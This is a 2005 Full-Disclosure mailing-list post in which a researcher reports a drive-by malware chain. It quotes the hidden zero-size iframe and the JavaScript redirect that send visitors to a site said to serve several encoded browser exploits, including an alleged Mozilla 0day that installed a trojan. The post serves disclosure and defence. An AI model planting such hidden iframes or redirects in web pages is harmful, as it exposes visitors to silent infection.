[Full-disclosure] http://molecularmultimedia.com/ an exploitdistribution point (update2)

Aditya Deshmukh aditya.deshmukh at online.gateway.strangled.net
Tue Oct 4 17:34:30 BST 2005


> FYI,
>
> I've had the site www.ok-ok.biz disabled by the ISP, at least
> it will deny the
> perps the ability to find out who has been compromised. The
> molecularmultimedia
> site is obvioulsy just a front, will see what can be done about this.

The site was found after 2 different attempts here are more details

http://newvisioncc.org/photo/myphoto.jpg   which is

<html>
<img src="1.jpg">
<iframe src="http://traff.root-soft.com" width="0" height="0"></iframe>
</html>
---- end myphoto.jpg

And http://traff.root-soft.com is

<script>self.location.href='http://molecularmultimedia.com'</script>

-----end index.html

And molecularmultimedia.com is the front end to something more sinister....

Also visiting molecularmultimedia.com with mozilla with the latest version of
mozilla
With all the patches still caued the trojan to be executed - I found this from
the
Norton antivir logs ....


> It's amazing looking at the page source, there are at least 4
> different exploits
> (I'm still analysing this) encoded into the javascript
> components of the page.

And they are pretty good also - new 0day for mozilla also 1.7.12!

Will let you all know if I find anything!...


-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3442 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051004/1d1194b4/attachment.bin 


Full-Disclosure is hosted and sponsored by Secunia.